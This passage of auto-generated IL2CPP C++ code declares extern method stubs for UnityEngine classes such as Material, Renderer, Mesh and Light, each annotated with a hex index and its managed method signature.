extern void GL_GLClear_mBFB93D93631651C66CE066CCE714A0D830742668 (void);
// 0x000001E7 System.Void UnityEngine.GL::Clear(System.Boolean,System.Boolean,UnityEngine.Color,System.Single)
extern void GL_Clear_mD748D5A6771761276FC9D2575A6873E51F90EA98 (void);
// 0x000001E8 System.Void UnityEngine.GL::Viewport(UnityEngine.Rect)
extern void GL_Viewport_mEB02BD765EBA8B3474864D735DDD1FEB74609D9F (void);
// 0x000001E9 System.Void UnityEngine.GL::SetViewMatrix_Injected(UnityEngine.Matrix4x4&)
extern void GL_SetViewMatrix_Injected_m390ED4CAD334BC81308B43D30E822E814C566522 (void);
// 0x000001EA System.Void UnityEngine.GL::LoadProjectionMatrix_Injected(UnityEngine.Matrix4x4&)
extern void GL_LoadProjectionMatrix_Injected_m99895E48BE777AEA2ED4F0926FBCEBB2E588E57F (void);
// 0x000001EB System.Void UnityEngine.GL::GLClear_Injected(System.Boolean,System.Boolean,UnityEngine.Color&,System.Single)
extern void GL_GLClear_Injected_m340FE5EB95332F578B9E51842A10D20B54062E29 (void);
// 0x000001EC System.Void UnityEngine.GL::Viewport_Injected(UnityEngine.Rect&)
extern void GL_Viewport_Injected_mE3F29CE821CC6AE7DBCE7CCC7623809C59F9E8EF (void);
// 0x000001ED System.Void UnityEngine.LightProbes::Internal_CallTetrahedralizationCompletedFunction()
extern void LightProbes_Internal_CallTetrahedralizationCompletedFunction_m8C1C2DCD3865A746E9526BDDD27B1B0A0FD09B57 (void);
// 0x000001EE System.Void UnityEngine.LightProbes::Internal_CallNeedsRetetrahedralizationFunction()
extern void LightProbes_Internal_CallNeedsRetetrahedralizationFunction_m34576D62441FB37083D1664E32E3756900CF183C (void);
// 0x000001EF System.String UnityEngine.Resolution::ToString()
extern void Resolution_ToString_m058CE120CC83F314D0C8D4A706F9AA068BC9CF34 (void);
// 0x000001F0 System.Int32 UnityEngine.QualitySettings::get_vSyncCount()
extern void QualitySettings_get_vSyncCount_m623B92EE9CBB51A7A96CA88022319CC46CC02F24 (void);
// 0x000001F1 System.Void UnityEngine.QualitySettings::set_vSyncCount(System.Int32)
extern void QualitySettings_set_vSyncCount_m37CB89BA3DF4BE2E181339F5F44F03C493733360 (void);
// 0x000001F2 UnityEngine.ColorSpace UnityEngine.QualitySettings::get_activeColorSpace()
extern void QualitySettings_get_activeColorSpace_m7BD95E037EC83AD498617F7906B41932CE33288B (void);
// 0x000001F3 System.Single UnityEngine.LineRenderer::get_widthMultiplier()
extern void LineRenderer_get_widthMultiplier_m8238A8640520DD38DAE4DF00D227C1328A8550C3 (void);
// 0x000001F4 System.Void UnityEngine.LineRenderer::set_widthMultiplier(System.Single)
extern void LineRenderer_set_widthMultiplier_mB1B825C2AAE0BB5F05431DEDAC5856EF27478255 (void);
// 0x000001F5 System.Void UnityEngine.LineRenderer::set_startColor(UnityEngine.Color)
extern void LineRenderer_set_startColor_mF72FAB20C09372FC8F2CBFCBD837FA02A87FBA91 (void);
// 0x000001F6 System.Void UnityEngine.LineRenderer::set_endColor(UnityEngine.Color)
extern void LineRenderer_set_endColor_m6AF26E0174434828BC6EF1BAC1FE188084819D9D (void);
// 0x000001F7 System.Void UnityEngine.LineRenderer::set_positionCount(System.Int32)
extern void LineRenderer_set_positionCount_m2001FB4044053895ECBE897AB833284F3300B205 (void);
// 0x000001F8 System.Void UnityEngine.LineRenderer::SetPosition(System.Int32,UnityEngine.Vector3)
extern void LineRenderer_SetPosition_m84C4AD9ADC6AC62B33DB4D7E4C9F066DFF8440C1 (void);
// 0x000001F9 System.Void UnityEngine.LineRenderer::set_startColor_Injected(UnityEngine.Color&)
extern void LineRenderer_set_startColor_Injected_mF6589CABC27AAEB4F8F98D20F9248A6EDD7CDA52 (void);
// 0x000001FA System.Void UnityEngine.LineRenderer::set_endColor_Injected(UnityEngine.Color&)
extern void LineRenderer_set_endColor_Injected_mF740E500F675A675C7F92BD2100336D0ED0F2691 (void);
// 0x000001FB System.Void UnityEngine.LineRenderer::SetPosition_Injected(System.Int32,UnityEngine.Vector3&)
extern void LineRenderer_SetPosition_Injected_m27450601152034E046A3181A374382A0DE636682 (void);
// 0x000001FC System.Void UnityEngine.MaterialPropertyBlock::SetFloatImpl(System.Int32,System.Single)
extern void MaterialPropertyBlock_SetFloatImpl_m65B3A7B090CDD9E32BA6D85637C37980C1D38DE8 (void);
// 0x000001FD System.Void UnityEngine.MaterialPropertyBlock::SetVectorImpl(System.Int32,UnityEngine.Vector4)
extern void MaterialPropertyBlock_SetVectorImpl_mA91796B91A33617D2BDFEC33612A7C595011CAC1 (void);
// 0x000001FE System.Void UnityEngine.MaterialPropertyBlock::SetColorImpl(System.Int32,UnityEngine.Color)
extern void MaterialPropertyBlock_SetColorImpl_mCE88355D90601D10E0527BFC1B40F0A1433059C0 (void);
// 0x000001FF System.Void UnityEngine.MaterialPropertyBlock::SetTextureImpl(System.Int32,UnityEngine.Texture)
extern void MaterialPropertyBlock_SetTextureImpl_m4F16E63E86A344A8FB595BBD7132641593427F95 (void);
// 0x00000200 System.Void UnityEngine.MaterialPropertyBlock::SetVectorArrayImpl(System.Int32,UnityEngine.Vector4[],System.Int32)
extern void MaterialPropertyBlock_SetVectorArrayImpl_mFED50BE8138077759CB79FF448A7AD9B4F27D981 (void);
// 0x00000201 System.IntPtr UnityEngine.MaterialPropertyBlock::CreateImpl()
extern void MaterialPropertyBlock_CreateImpl_m98E2714F72E720074AED038F85E0ACB00C8FBC16 (void);
// 0x00000202 System.Void UnityEngine.MaterialPropertyBlock::DestroyImpl(System.IntPtr)
extern void MaterialPropertyBlock_DestroyImpl_mC98A3C8791C2EC057A570F64F7E6F43AB7D34F05 (void);
// 0x00000203 System.Void UnityEngine.MaterialPropertyBlock::Clear(System.Boolean)
extern void MaterialPropertyBlock_Clear_m18CD90F6F18294A59C408FFCCC8F6F5EE204E6D4 (void);
// 0x00000204 System.Void UnityEngine.MaterialPropertyBlock::Clear()
extern void MaterialPropertyBlock_Clear_m83CE1CC476A80F162FC89DBF6C2C78659B6E1253 (void);
// 0x00000205 System.Void UnityEngine.MaterialPropertyBlock::SetVectorArray(System.Int32,UnityEngine.Vector4[],System.Int32)
extern void MaterialPropertyBlock_SetVectorArray_m92BE44069E96A65D975F989B9C2703819B4D9709 (void);
// 0x00000206 System.Void UnityEngine.MaterialPropertyBlock::.ctor()
extern void MaterialPropertyBlock__ctor_m14C3432585F7BB65028BCD64A0FD6607A1B490FB (void);
// 0x00000207 System.Void UnityEngine.MaterialPropertyBlock::Finalize()
extern void MaterialPropertyBlock_Finalize_m39FFB2D5E0348431D63EE94E263032CA6C7040BF (void);
// 0x00000208 System.Void UnityEngine.MaterialPropertyBlock::Dispose()
extern void MaterialPropertyBlock_Dispose_m4D2F96068928FBC127E3A48B45DB5F3C0022B3E3 (void);
// 0x00000209 System.Void UnityEngine.MaterialPropertyBlock::SetFloat(System.Int32,System.Single)
extern void MaterialPropertyBlock_SetFloat_m6BA8DA03FAD1ABA0BD339E0E5157C4DF3C987267 (void);
// 0x0000020A System.Void UnityEngine.MaterialPropertyBlock::SetVector(System.Int32,UnityEngine.Vector4)
extern void MaterialPropertyBlock_SetVector_m22B010D99231EF5684063F4A07F5948854D590B3 (void);
// 0x0000020B System.Void UnityEngine.MaterialPropertyBlock::SetColor(System.String,UnityEngine.Color)
extern void MaterialPropertyBlock_SetColor_m5B4E910B5E42518BBD0088055EB68E4A3A609DDE (void);
// 0x0000020C System.Void UnityEngine.MaterialPropertyBlock::SetTexture(System.Int32,UnityEngine.Texture)
extern void MaterialPropertyBlock_SetTexture_m39F531D3F35D6C5B661A7B4F07DD7B8ACC22627F (void);
// 0x0000020D System.Void UnityEngine.MaterialPropertyBlock::SetVectorArray(System.Int32,UnityEngine.Vector4[])
extern void MaterialPropertyBlock_SetVectorArray_m5C0A3017A7EA9EE5F01295E346EA72D70A8BD682 (void);
// 0x0000020E System.Void UnityEngine.MaterialPropertyBlock::SetVectorImpl_Injected(System.Int32,UnityEngine.Vector4&)
extern void MaterialPropertyBlock_SetVectorImpl_Injected_m3F860A6FF7908C66A89B280CE69E57D1CFB64875 (void);
// 0x0000020F System.Void UnityEngine.MaterialPropertyBlock::SetColorImpl_Injected(System.Int32,UnityEngine.Color&)
extern void MaterialPropertyBlock_SetColorImpl_Injected_m48FC0ED590321DA73DA5BEC25ACD81003F58216A (void);
// 0x00000210 UnityEngine.Material UnityEngine.Renderer::GetMaterial()
extern void Renderer_GetMaterial_m890C1B7FAA74CFC4B362EE3E8E61F6778D0EA189 (void);
// 0x00000211 UnityEngine.Material UnityEngine.Renderer::GetSharedMaterial()
extern void Renderer_GetSharedMaterial_mD825E40750BD40B66D0A9FE4C283040E516FF192 (void);
// 0x00000212 System.Void UnityEngine.Renderer::SetMaterial(UnityEngine.Material)
extern void Renderer_SetMaterial_mD7F173BF5941C840EB5A24FEF8B7BC3BAFAF7CCA (void);
// 0x00000213 UnityEngine.Material[] UnityEngine.Renderer::GetMaterialArray()
extern void Renderer_GetMaterialArray_m27C05A258B1D2A7EA7A77FFE57929B7A0EDB2AF9 (void);
// 0x00000214 System.Void UnityEngine.Renderer::Internal_SetPropertyBlock(UnityEngine.MaterialPropertyBlock)
extern void Renderer_Internal_SetPropertyBlock_m53DA7BACEEF0CFD23E6C2C2675E7A205388A68CF (void);
// 0x00000215 System.Void UnityEngine.Renderer::Internal_GetPropertyBlock(UnityEngine.MaterialPropertyBlock)
extern void Renderer_Internal_GetPropertyBlock_mAD37BD3873CDEE8C5BFD367677CD30F7BDAD4589 (void);
// 0x00000216 System.Void UnityEngine.Renderer::SetPropertyBlock(UnityEngine.MaterialPropertyBlock)
extern void Renderer_SetPropertyBlock_mF565698782FE54580B17CC0BFF9B0C4F0D68DF50 (void);
// 0x00000217 System.Void UnityEngine.Renderer::GetPropertyBlock(UnityEngine.MaterialPropertyBlock)
extern void Renderer_GetPropertyBlock_mD062F90343D70151CA060AE7EBEF2E85146A9FBA (void);
// 0x00000218 System.Boolean UnityEngine.Renderer::get_enabled()
extern void Renderer_get_enabled_mFDDF363859AEC88105A925FA7EA341C077B09B54 (void);
// 0x00000219 System.Void UnityEngine.Renderer::set_enabled(System.Boolean)
extern void Renderer_set_enabled_m015E6D7B825528A31182F267234CC6A925F71DA8 (void);
// 0x0000021A System.Void UnityEngine.Renderer::set_shadowCastingMode(UnityEngine.Rendering.ShadowCastingMode)
extern void Renderer_set_shadowCastingMode_mB0CD3D153E43044388AEFF7AEFDA93E80EB36D11 (void);
// 0x0000021B System.Void UnityEngine.Renderer::set_receiveShadows(System.Boolean)
extern void Renderer_set_receiveShadows_mABEB4C72E96E65117B7FFFD4180247565D0C1A09 (void);
// 0x0000021C System.Int32 UnityEngine.Renderer::get_sortingLayerID()
extern void Renderer_get_sortingLayerID_m3D7AE74F1B87099810CF969CB4520C85F9AE5F92 (void);
// 0x0000021D System.Void UnityEngine.Renderer::set_sortingLayerID(System.Int32)
extern void Renderer_set_sortingLayerID_m289E44FD06B6692C7B2ADD1189FE4FC013180C49 (void);
// 0x0000021E System.Int32 UnityEngine.Renderer::get_sortingOrder()
extern void Renderer_get_sortingOrder_m4CE7ADEEC8E2F28CC1D10B1D4091A10F8F1583FA (void);
// 0x0000021F System.Void UnityEngine.Renderer::set_sortingOrder(System.Int32)
extern void Renderer_set_sortingOrder_m4C67F002AD68CA0D55D20D6B78CDED3DB24467DA (void);
// 0x00000220 UnityEngine.Material[] UnityEngine.Renderer::get_materials()
extern void Renderer_get_materials_m43D33328432700524EAEAB093C67AE5689976118 (void);
// 0x00000221 UnityEngine.Material UnityEngine.Renderer::get_material()
extern void Renderer_get_material_m5BA2A00816C4CC66580D4B2E409CF10718C15656 (void);
// 0x00000222 UnityEngine.Material UnityEngine.Renderer::get_sharedMaterial()
extern void Renderer_get_sharedMaterial_mA2E0CA0A564617FFC3E0E50947C6300082C35F81 (void);
// 0x00000223 System.Void UnityEngine.Renderer::set_sharedMaterial(UnityEngine.Material)
extern void Renderer_set_sharedMaterial_m5E842F9A06CFB7B77656EB319881CB4B3E8E4288 (void);
// 0x00000224 UnityEngine.Shader UnityEngine.Shader::Find(System.String)
extern void Shader_Find_mFF2A8FC042B9CFAA9800679CA674D52859BF3A72 (void);
// 0x00000225 System.Int32 UnityEngine.Shader::TagToID(System.String)
extern void Shader_TagToID_m1FD312CA7913C007B8A80F638C3DCD24B5E47323 (void);
// 0x00000226 System.Int32 UnityEngine.Shader::PropertyToID(System.String)
extern void Shader_PropertyToID_mF5F7BA2EFF23D83482ECDE4C34227145D817B1EB (void);
// 0x00000227 System.Void UnityEngine.Shader::.ctor()
extern void Shader__ctor_m2BD5A93728781AEF4DCA08F3BCC93C0A62B864C1 (void);
// 0x00000228 System.Void UnityEngine.Material::CreateWithShader(UnityEngine.Material,UnityEngine.Shader)
extern void Material_CreateWithShader_m612CA74B5ECE867532F304FC23E0B96B584C4538 (void);
// 0x00000229 System.Void UnityEngine.Material::CreateWithMaterial(UnityEngine.Material,UnityEngine.Material)
extern void Material_CreateWithMaterial_m520BA35C446CE25C45784F18D882A02B5D3B215E (void);
// 0x0000022A System.Void UnityEngine.Material::CreateWithString(UnityEngine.Material)
extern void Material_CreateWithString_m68659922AE0E29B3ED44C9262FF2FA381E5EFA87 (void);
// 0x0000022B System.Void UnityEngine.Material::.ctor(UnityEngine.Shader)
extern void Material__ctor_m7FDF47105D66D19591BE505A0C42B0F90D88C9BF (void);
// 0x0000022C System.Void UnityEngine.Material::.ctor(UnityEngine.Material)
extern void Material__ctor_mFCC42FB90257F1E8F7516A8640A79C465A39961C (void);
// 0x0000022D System.Void UnityEngine.Material::.ctor(System.String)
extern void Material__ctor_mF1676C2EE42E6BCE74AC3C90E207A35E515D1FD8 (void);
// 0x0000022E UnityEngine.Color UnityEngine.Material::get_color()
extern void Material_get_color_mA4B7D4B96200D9D8B4F36BF19957E9DA81071DBB (void);
// 0x0000022F System.Void UnityEngine.Material::set_color(UnityEngine.Color)
extern void Material_set_color_m5C32DEBB215FF9EE35E7B575297D8C2F29CC2A2D (void);
// 0x00000230 UnityEngine.Texture UnityEngine.Material::get_mainTexture()
extern void Material_get_mainTexture_mC6C6B860B44321F0342AEFA0DD7702384334F37D (void);
// 0x00000231 System.Int32 UnityEngine.Material::GetFirstPropertyNameIdByAttribute(UnityEngine.Rendering.ShaderPropertyFlags)
extern void Material_GetFirstPropertyNameIdByAttribute_mCBB72749633F7B8A879D33F0B34DB4F54F8C2439 (void);
// 0x00000232 System.Boolean UnityEngine.Material::HasProperty(System.Int32)
extern void Material_HasProperty_m52E2D3BC3049B8B228149E023CD73C34B05A5222 (void);
// 0x00000233 System.Boolean UnityEngine.Material::HasProperty(System.String)
extern void Material_HasProperty_mC09A83B44E368A217F606DD4954FA080CC03EC6C (void);
// 0x00000234 System.Void UnityEngine.Material::set_renderQueue(System.Int32)
extern void Material_set_renderQueue_mFBB72A781DCCF0D4B85670B597788EC2D02D1C14 (void);
// 0x00000235 System.Void UnityEngine.Material::EnableKeyword(System.String)
extern void Material_EnableKeyword_mE8523EF6CF694284DF976D47ADEDE9363A1174AC (void);
// 0x00000236 System.Void UnityEngine.Material::DisableKeyword(System.String)
extern void Material_DisableKeyword_mC123927EBF2F2A19220A4456C8EA19F2BA416E8C (void);
// 0x00000237 System.Boolean UnityEngine.Material::IsKeywordEnabled(System.String)
extern void Material_IsKeywordEnabled_m95EDB12868EBE7F404755CB79E5958B7DFA342D0 (void);
// 0x00000238 System.Int32 UnityEngine.Material::get_passCount()
extern void Material_get_passCount_m7BA071AFFA34DC3E49B56A16CB8B098566BDE765 (void);
// 0x00000239 System.String UnityEngine.Material::GetTagImpl(System.String,System.Boolean,System.String)
extern void Material_GetTagImpl_m0A15070E738DE3834BEDD9D1634C498B5B744C2B (void);
// 0x0000023A System.String UnityEngine.Material::GetTag(System.String,System.Boolean)
extern void Material_GetTag_m0B37070270E231B88808DB1B3F9EF4C1851627D4 (void);
// 0x0000023B System.Boolean UnityEngine.Material::SetPass(System.Int32)
extern void Material_SetPass_mBB03542DFF4FAEADFCED332009F9D61B6DED75FE (void);
// 0x0000023C System.Void UnityEngine.Material::CopyPropertiesFromMaterial(UnityEngine.Material)
extern void Material_CopyPropertiesFromMaterial_m4148227E6A0B8E66315D8115F656B7F8BEAE915B (void);
// 0x0000023D System.String[] UnityEngine.Material::GetShaderKeywords()
extern void Material_GetShaderKeywords_mEEE6AA1A327A7D63B8CD31306B70AAED6F7B7456 (void);
// 0x0000023E System.Void UnityEngine.Material::SetShaderKeywords(System.String[])
extern void Material_SetShaderKeywords_mB0751FC936E7546A20DD6531B52E3B0EAF5BB3A8 (void);
// 0x0000023F System.String[] UnityEngine.Material::get_shaderKeywords()
extern void Material_get_shaderKeywords_m11982F09EED6BB0A892342E1A72AEA470C44B105 (void);
// 0x00000240 System.Void UnityEngine.Material::set_shaderKeywords(System.String[])
extern void Material_set_shaderKeywords_mD650CF82B2DBB75F001E373E2E1ACA30876F3AB8 (void);
// 0x00000241 System.Int32 UnityEngine.Material::ComputeCRC()
extern void Material_ComputeCRC_m5F743B7178F5E474A8FE15E5C0B1A6527E6E3A77 (void);
// 0x00000242 System.Void UnityEngine.Material::SetFloatImpl(System.Int32,System.Single)
extern void Material_SetFloatImpl_m78678CE6EBB67BA3E9D58AD37CE3BDA3789F43AB (void);
// 0x00000243 System.Void UnityEngine.Material::SetColorImpl(System.Int32,UnityEngine.Color)
extern void Material_SetColorImpl_mC2AF99ED12166A5219C0E8B79D0D17C0FCFC0E3D (void);
// 0x00000244 System.Void UnityEngine.Material::SetMatrixImpl(System.Int32,UnityEngine.Matrix4x4)
extern void Material_SetMatrixImpl_m634CD43159467FE20FF3860B5F9848101A9B0CE3 (void);
// 0x00000245 System.Void UnityEngine.Material::SetTextureImpl(System.Int32,UnityEngine.Texture)
extern void Material_SetTextureImpl_mC5772481EBD0F0A488C564B424446514DF34CBD9 (void);
// 0x00000246 System.Single UnityEngine.Material::GetFloatImpl(System.Int32)
extern void Material_GetFloatImpl_m39798817949E201E1CF85DBBD416C746F3D64794 (void);
// 0x00000247 UnityEngine.Color UnityEngine.Material::GetColorImpl(System.Int32)
extern void Material_GetColorImpl_m44455DBA8C6391B5638D11934B8E4CC0713B4EFF (void);
// 0x00000248 UnityEngine.Texture UnityEngine.Material::GetTextureImpl(System.Int32)
extern void Material_GetTextureImpl_m0363E7A333009D2FBEEBA51FC5D6E219563FF288 (void);
// 0x00000249 System.Void UnityEngine.Material::SetFloat(System.String,System.Single)
extern void Material_SetFloat_m879CF81D740BAE6F23C9822400679F4D16365836 (void);
// 0x0000024A System.Void UnityEngine.Material::SetFloat(System.Int32,System.Single)
extern void Material_SetFloat_m3ECFD92072347A8620254F014865984FA68211A8 (void);
// 0x0000024B System.Void UnityEngine.Material::SetColor(System.String,UnityEngine.Color)
extern void Material_SetColor_mFAB32FAA44461E46FD707B34184EC080CBB3539F (void);
// 0x0000024C System.Void UnityEngine.Material::SetColor(System.Int32,UnityEngine.Color)
extern void Material_SetColor_m573C88F2FB1B5A978C53A197B414F9E9C6AC5B9A (void);
// 0x0000024D System.Void UnityEngine.Material::SetVector(System.Int32,UnityEngine.Vector4)
extern void Material_SetVector_m44CD02D4555E2AF391C30700F0AEC36BA04CFEA7 (void);
// 0x0000024E System.Void UnityEngine.Material::SetMatrix(System.Int32,UnityEngine.Matrix4x4)
extern void Material_SetMatrix_m668579C6402F88BFEF769D39E484BAD4CE6B0067 (void);
// 0x0000024F System.Void UnityEngine.Material::SetTexture(System.Int32,UnityEngine.Texture)
extern void Material_SetTexture_mA9F8461850AAB88F992E9C6FA6F24C2E050B83FD (void);
// 0x00000250 System.Single UnityEngine.Material::GetFloat(System.String)
extern void Material_GetFloat_m2A77F10E6AA13EA3FA56166EFEA897115A14FA5A (void);
// 0x00000251 System.Single UnityEngine.Material::GetFloat(System.Int32)
extern void Material_GetFloat_m52462F4AEDE20758BFB592B11DE83A79D2774932 (void);
// 0x00000252 UnityEngine.Color UnityEngine.Material::GetColor(System.String)
extern void Material_GetColor_mAC702C70081A597DD2AA2F4627B1A1C65DDF6609 (void);
// 0x00000253 UnityEngine.Color UnityEngine.Material::GetColor(System.Int32)
extern void Material_GetColor_mCCC62F29234C5D2D9B19EE2D7DA46A4573AFA765 (void);
// 0x00000254 UnityEngine.Vector4 UnityEngine.Material::GetVector(System.Int32)
extern void Material_GetVector_mFE0366FDCB87331910BCE5E234030C20A25484A2 (void);
// 0x00000255 UnityEngine.Texture UnityEngine.Material::GetTexture(System.String)
extern void Material_GetTexture_mBA07A377A7DDD29CD53E6F687DE6D49A42C0C719 (void);
// 0x00000256 UnityEngine.Texture UnityEngine.Material::GetTexture(System.Int32)
extern void Material_GetTexture_mE5D02B13E7AF35ABAE4FFC49E69FAF8F36F91191 (void);
// 0x00000257 System.Void UnityEngine.Material::SetColorImpl_Injected(System.Int32,UnityEngine.Color&)
extern void Material_SetColorImpl_Injected_m7AF196BB00E62E5B47067FD643740884C692694A (void);
// 0x00000258 System.Void UnityEngine.Material::SetMatrixImpl_Injected(System.Int32,UnityEngine.Matrix4x4&)
extern void Material_SetMatrixImpl_Injected_m982E0183155834D0018A8A0174DBE0536F56D49E (void);
// 0x00000259 System.Void UnityEngine.Material::GetColorImpl_Injected(System.Int32,UnityEngine.Color&)
extern void Material_GetColorImpl_Injected_mC524E0342AAF07A17E22CDBA0FAA0BAC0689CED4 (void);
// 0x0000025A UnityEngine.LightType UnityEngine.Light::get_type()
extern void Light_get_type_m0D12CD1E54E010DC401F7371731D593DEF62D1C7 (void);
// 0x0000025B System.Single UnityEngine.Light::get_spotAngle()
extern void Light_get_spotAngle_m28B2CD7ADE25422693E7B1FA23E8615E9D7098FC (void);
// 0x0000025C UnityEngine.Color UnityEngine.Light::get_color()
extern void Light_get_color_mE7EB8F11BF394877B50A2F335627441889ADE536 (void);
// 0x0000025D System.Single UnityEngine.Light::get_intensity()
extern void Light_get_intensity_m8FA28D515853068A93FA68B2148809BBEE4E710F (void);
// 0x0000025E System.Void UnityEngine.Light::set_intensity(System.Single)
extern void Light_set_intensity_mE4820C7F39F490B92ED5EA0C3AADA7C0775BE854 (void);
// 0x0000025F System.Single UnityEngine.Light::get_bounceIntensity()
extern void Light_get_bounceIntensity_m535008F539A0EF22BBB831113EC34F20D6331FAE (void);
// 0x00000260 System.Single UnityEngine.Light::get_range()
extern void Light_get_range_m4156F07BA6CD289DA47080B590D632721D975A22 (void);
// 0x00000261 UnityEngine.LightBakingOutput UnityEngine.Light::get_bakingOutput()
extern void Light_get_bakingOutput_mF383DB97CFD32D65DA468329E18DD2DD61521CED (void);
// 0x00000262 UnityEngine.LightShadows UnityEngine.Light::get_shadows()
extern void Light_get_shadows_m1A11721F202C27838A7A8ED72455E6A727CEE6C5 (void);
// 0x00000263 System.Single UnityEngine.Light::get_cookieSize()
extern void Light_get_cookieSize_m1BB417985207915659198F63CF825A23A8ED30B0 (void);
// 0x00000264 UnityEngine.Texture UnityEngine.Light::get_cookie()
extern void Light_get_cookie_m44A0C4B92F6CD6F2F8536A91C51B77FEEF59715E (void);
// 0x00000265 System.Void UnityEngine.Light::get_color_Injected(UnityEngine.Color&)
extern void Light_get_color_Injected_m7B1E67B800788DF5DAF6C3114CBACA3B029A900A (void);
// 0x00000266 System.Void UnityEngine.Light::get_bakingOutput_Injected(UnityEngine.LightBakingOutput&)
extern void Light_get_bakingOutput_Injected_m587C60162C878716DF9310258756C2F587E35185 (void);
// 0x00000267 System.Void UnityEngine.MeshFilter::DontStripMeshFilter()
extern void MeshFilter_DontStripMeshFilter_m91485EC5EAB0DFED85197CF48DB2DD5C872695AC (void);
// 0x00000268 UnityEngine.Mesh UnityEngine.MeshFilter::get_sharedMesh()
extern void MeshFilter_get_sharedMesh_mE4ED3E7E31C1DE5097E4980DA996E620F7D7CB8C (void);
// 0x00000269 System.Void UnityEngine.MeshFilter::set_sharedMesh(UnityEngine.Mesh)
extern void MeshFilter_set_sharedMesh_m946F7E3F583761982642BDA4753784AF1DF6E16F (void);
// 0x0000026A UnityEngine.Mesh UnityEngine.MeshFilter::get_mesh()
extern void MeshFilter_get_mesh_m13172D7EF6682861971817D0A47EE2BE49FBCB1C (void);
// 0x0000026B System.Void UnityEngine.MeshRenderer::DontStripMeshRenderer()
extern void MeshRenderer_DontStripMeshRenderer_m6AA14C7B8A41C6BBCDE33338AAB96239048192A1 (void);
// 0x0000026C System.Void UnityEngine.Mesh::Internal_Create(UnityEngine.Mesh)
extern void Mesh_Internal_Create_m0CB60738992BB5DFEE6A8E210DBEC5D21B499AD7 (void);
// 0x0000026D System.Void UnityEngine.Mesh::.ctor()
extern void Mesh__ctor_m5A9AECEDDAFFD84811ED8928012BDE97A9CEBD00 (void);
// 0x0000026E System.Int32[] UnityEngine.Mesh::GetIndicesImpl(System.Int32,System.Boolean)
extern void Mesh_GetIndicesImpl_m2A93DF68D761B4F7559A40617C41B543535B8739 (void);
// 0x0000026F System.Void UnityEngine.Mesh::SetIndicesImpl(System.Int32,UnityEngine.MeshTopology,UnityEngine.Rendering.IndexFormat,System.Array,System.Int32,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetIndicesImpl_m8C51773B1B4F164E4A9EAE3A8A90D73319595B89 (void);
// 0x00000270 System.Void UnityEngine.Mesh::SetIndicesNativeArrayImpl(System.Int32,UnityEngine.MeshTopology,UnityEngine.Rendering.IndexFormat,System.IntPtr,System.Int32,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetIndicesNativeArrayImpl_mFE8E16A329DB9A024263920C2A5FC3287A42E93D (void);
// 0x00000271 System.Void UnityEngine.Mesh::PrintErrorCantAccessChannel(UnityEngine.Rendering.VertexAttribute)
extern void Mesh_PrintErrorCantAccessChannel_mD80AC1870BC51714BE0C97B15D3E3D4EC42AC85E (void);
// 0x00000272 System.Boolean UnityEngine.Mesh::HasVertexAttribute(UnityEngine.Rendering.VertexAttribute)
extern void Mesh_HasVertexAttribute_m6FA9574E4DEE19158535F93281791AD6FB550595 (void);
// 0x00000273 System.Void UnityEngine.Mesh::SetArrayForChannelImpl(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.Array,System.Int32,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetArrayForChannelImpl_mB6E87CFC14E1C7F12A921A2EB90004DC0108BE3C (void);
// 0x00000274 System.Void UnityEngine.Mesh::SetNativeArrayForChannelImpl(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.IntPtr,System.Int32,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetNativeArrayForChannelImpl_mC0768D36A195AA3F802BBEE1E9681293156F3059 (void);
// 0x00000275 System.Array UnityEngine.Mesh::GetAllocArrayFromChannelImpl(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32)
extern void Mesh_GetAllocArrayFromChannelImpl_m30C7972CA5A67CD01EBBDDE2FD8F48CE2F8F86F6 (void);
// 0x00000276 System.Void UnityEngine.Mesh::GetArrayFromChannelImpl(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.Array)
extern void Mesh_GetArrayFromChannelImpl_mBCA166B62E25425D987638F2B4876613D113E66E (void);
// 0x00000277 System.Boolean UnityEngine.Mesh::get_canAccess()
extern void Mesh_get_canAccess_m97F255BBB8C009D643920E2D095B6DB8868E3572 (void);
// 0x00000278 System.Int32 UnityEngine.Mesh::get_vertexCount()
extern void Mesh_get_vertexCount_mB7BE0340AAF272933068D830C8E711FC8978E12C (void);
// 0x00000279 System.Int32 UnityEngine.Mesh::get_subMeshCount()
extern void Mesh_get_subMeshCount_mC0141293D0F339D8D721CCA2612B32E6FD7E3F8B (void);
// 0x0000027A UnityEngine.Bounds UnityEngine.Mesh::get_bounds()
extern void Mesh_get_bounds_m9E3A46226824676703990270A722A89A4860A100 (void);
// 0x0000027B System.Void UnityEngine.Mesh::set_bounds(UnityEngine.Bounds)
extern void Mesh_set_bounds_m2E526E9B61ACA77D644C22A9D8EB49583012B54E (void);
// 0x0000027C System.Void UnityEngine.Mesh::ClearImpl(System.Boolean)
extern void Mesh_ClearImpl_m671C073131284D65405DE7480536EE16A2815A62 (void);
// 0x0000027D System.Void UnityEngine.Mesh::RecalculateBoundsImpl(UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_RecalculateBoundsImpl_m33B65339F18DE70FDB0914F466281CDC39CAE5C2 (void);
// 0x0000027E System.Void UnityEngine.Mesh::RecalculateNormalsImpl(UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_RecalculateNormalsImpl_m87F16BA219482F6BF7B9E549291A2159C5625075 (void);
// 0x0000027F System.Void UnityEngine.Mesh::MarkDynamicImpl()
extern void Mesh_MarkDynamicImpl_m989606245279A69A710361DC0443BE39960DF857 (void);
// 0x00000280 UnityEngine.Rendering.VertexAttribute UnityEngine.Mesh::GetUVChannel(System.Int32)
extern void Mesh_GetUVChannel_mED19A64A1C824E8AC1505CF3EEFD797A22A31FD4 (void);
// 0x00000281 System.Int32 UnityEngine.Mesh::DefaultDimensionForChannel(UnityEngine.Rendering.VertexAttribute)
extern void Mesh_DefaultDimensionForChannel_m982B3DA65DC94227BB91893B957C56B9CAFC7F9A (void);
// 0x00000282 T[] UnityEngine.Mesh::GetAllocArrayFromChannel(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32)
